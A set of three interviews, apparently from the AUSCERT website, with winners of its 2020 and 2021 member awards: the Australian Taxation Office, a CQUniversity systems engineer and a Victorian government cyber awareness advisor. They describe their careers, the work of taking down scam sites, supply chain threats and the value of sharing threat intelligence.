AUSCERT2021 Member Organisation of the Year Winner We recently had the pleasure of chatting with Daniel Ross and Cody Byrnes from the Australian Taxation Office (ATO) who won the AUSCERT Member Organisation of the Year for 2021. Daniel and Cody both opened up about what it is like to be an AUSCERT member and how the ATO is dealing with new cyber security issues. How long has the Australian Taxation Office been an AUSCERT Member? Our membership goes back well over 10 years, and we’re always really pleased to come along to the AUSCERT conference each year. This was Cody’s and my first year in attendance and it was an overall fantastic experience. What value do you get out of the on-going AUSCERT membership? Our membership with AUSCERT has been invaluable in helping us successfully respond to the myriad of tax and super scams targeting Australians on a daily basis. The AUSCERT Team support us through the takedown of malicious phishing websites, domains and spam email accounts used in these scam campaigns, blocking the ability of the scammers and heavily reducing the number of potential scam victims. Their assistance in sharing the details of these scams with other AUSCERT members also broadens our reach in stopping these scams and heightens our ability to detect future scam campaigns. Congratulations on winning the Member Organisation Of The Year award! What does winning this award mean to you? Thank you! AUSCERT has provided much benefit to ATO over the years. It is great to know that the threat intelligence we share back with them and the broader community is of equal benefit and we appreciate receiving such recognition for this. What advice would you give other AUSCERT members? Engage and be involved with AUSCERT and the community members, and share back what you can, as we are stronger at defending against threats as a community. What cyber security challenges have you faced this year? We think we see a lot of similar challenges to other cyber security teams we talk to: making sure we’ve got the right resourcing, tools and skills in an ever-evolving landscape. One of the more specific challenges we face is protecting the public from ATO themed scams that try to steal their money or personal information. We’ve got a number of preventative strategies in place, as well as rapidly responding to threats as they emerge. This is where we work closely with AUSCERT to quickly respond. It’s very easy for a malicious actor to create a domain with ATO or tax in the title, so we need intelligence to identify these and quick response pipelines to de-activate the malicious domain and minimise the risk of a member of the public being compromised. What do you see as some of the main cyber threats in today’s society? Patching, scams, and supply chain are recurring common threats in today’s society. We see malicious actors weaponising vulnerabilities before patches have been implemented and therefore patching is still a very effective security mechanism in preventing threats to individuals and organisations alike. Scams continue to be an effective method in circumventing technical controls, and supply chain is increasingly targeted as a method of compromising the clients of the particular chain.      

AUSCERT2021 Member Individual of the Year Winner After the recent AUSCERT2021 conference, we caught up with Simon Coggins (Principal Systems Engineer at CQUniversity) to discuss his role in the cyber security sector, and how he felt about being awarded AUSCERT2021’s ‘Member Individual of The Year’. Tell us a little about your professional career? I’ve always been interested in system administration and networking. When I was in high school I started my own Bulletin Board System with a large user base and had a FidoNet address so that we could transfer email and forum posts around the world. While studying at university I started working at the local Internet Service Provider. We were small enough to only have a few staff so everyone had multiple jobs. I was a Sysadmin, Network Engineer, Developer and Tech Support. This led me to work at a University in NSW where I was the Network and Systems Management Officer. My role there involved  both networking and system administration duties as well as acting as a translation bridge between the network team and the sysadmin team. After working for 6 years at this university, friends I knew through the System Administrators Guild of Australia suggested I apply for a job at Central Queensland University, so I did.. That brings me to my current job that I’ve been in for over 15 years now. I started out as a Senior Systems Administrator and a few job title changes and roles later I’m now a Principal Systems Engineer. Because of my System Administration and Networking background and an understanding of how everything fitted together, this acted as a catalyst for security to start being included in things I was looking at. What’s involved in your day-to-day role as Principal Systems Engineer at CQUniversity ? I’m always busy doing something and every day is different. I’m the primary lead on our Linux Fleet, Firewalls, Load Balancers, SIEM platform, SAN Storage, Email Security, and the list goes on. So on any given day I will be doing operational work to keep the fleet of services running, level 3 work tickets that come in about weird issues that need problem solving, or project work for evaluating new products and testing them. Given I have a better than average understanding of how our network and systems fit together, and I have good problem solving skills, that allows me to help identify the cause of complex issues quicker. I like to think that my primary role is to automate my boring jobs where possible so I can focus on the fun ones but at the end of the day, I’m just someone that likes to solve problems, and in the process help people. Congratulations on winning the Member Individual of the Year! What does winning this award mean to you? What course will you use your SANS-sponsored prize for? It’s a great honour. AUSCERT is very trusted in the security community so getting this award is a huge deal. For me it means that what I’m doing is definitely helping other people. When I do things for CQUniversity I think to myself “Would this help me if someone else shared it?” If so, then I go and share that with the wider community via AUSCERT. This award reaffirms I’m doing good in the community. As for SANS courses, have you seen the list? It’s huge! I’m still trying to decide what I want to do, I’m thinking maybe Continuous Monitoring and Security Operations or something else on the Blue Team track. What do you see as some of the main cyber threats in today’s society? Are you seeing any trends of particular threats becoming more common? Ransomware and Phishing is the obvious choice, but for us we are seeing more and more supply chain attacks. The SolarWinds and PasswordState attacks drive home that you can do everything you possibly can to protect your systems, but you are only as good as the security of the companies that provide your tools. We need to update to fix security vulnerabilities but we can’t update until we’re sure the update hasn’t been compromised. Delay updating and you could end up with ransomware, be proactive and end up with a state based actor in your systems … It’s getting very hard! If you could give one piece of advice for organisations and IT/cyber security professionals, what would that be? In most cases you aren’t the only one defending against that cyber incident. At the end of the day we’re all Cyber Security Professionals and we’re probably defending against the same thing, at least across the same industry. You might be surprised to find out that your industry, even though it is competitive at front of house, already has an information sharing mechanism in place to assist and share common threats across the industry and there is a good chance that AUSCERT knows where to point you. They are also happy to accept any security reports, malware samples, and indicators of compromise that you might have, anonymise them and share them with the wider community of AUSCERT members if you wish to remain anonymous.    

AUSCERT2020 Member Individual of the Year Winner During the AUSCERT2020 Conference, we caught up with Rachael Leighton (Principal Advisor, Cyber Strategy & Awareness @ DPC Vic Gov) to discuss her role in the cyber security fight, and how she felt about being awarded AUSCERT2020’s ‘Member Individual of The Year. Tell us a little about your professional career? I actually started as a primary school teacher by trade. Then, during 2009 I worked as a volunteer firefighter and ended up contributing towards a community education program. This was my initial foray into IT, as part of the education project involved upgrading radios and informing the community on what to do. After this, I continued to work for different companies in an organisational change capacity. Eventually I ended up in a Big 4 bank and was working on the same floor as the anti-terror and anti-fraud team. One day I asked them—how do people learn and understand this stuff about cyber security? I realised that if I didn’t know it, surely others didn’t either. From there, my passion for educating people and encouraging organisations to change their behaviour, to consider cyber security and to cultivate a cyber culture was born. What’s involved in your day-to-day role at Principal Advisor—Cyber Strategy & Awareness for the Department of Premier and Cabinet? I see myself kind of like a conductor of an orchestra. When we think of cyber security and government, we, as government have a role in creating a Cyber Safe Victoria and that means… there are lots of moving parts – lots of activity that needs to take place and lots of different teams to secure all our kit. There is still some heavy lifting to do to connect the dots between academia, industry and government to form a vibrant cyber ecosystem. That’s my role – to bring all this together, usually through engaging and with meeting the right people, identifying synergies and opportunities for connecting them together.  Congratulations on winning Member Individual Of The Year. What does winning this award mean to you? I’m so honoured to get this award. To me, this validates the importance of collaboration. At the end of the day, cyber is hard. If we want to get ahead of the bad guys, we need to be sharing info, reporting incidents, and establishing a trusted and healthy feedback loop. This can be difficult to achieve when the traditional mindset of cyber security professionals is to protect what’s valuable. Yet it’s more beneficial for us all to break down the walls and build trust across the cyber community.    Trust was immediate for me when working with AUSCERT. The team will do anything they can to help Vic Gov uplift cyber posture. So thanks AUSCERT, I really appreciate this award. To be recognised for the willingness, and the crazy, that is cyber education and engagement is beautiful. If you could give one piece of advice for organisations and IT / cyber security professionals, what would that be? Reach out—don’t go it alone. Don’t try to be a lone hero—we are stronger together. We are a cyber family. Just like the baddies work together and collaborate, if we want to succeed against them, then we too need to work together.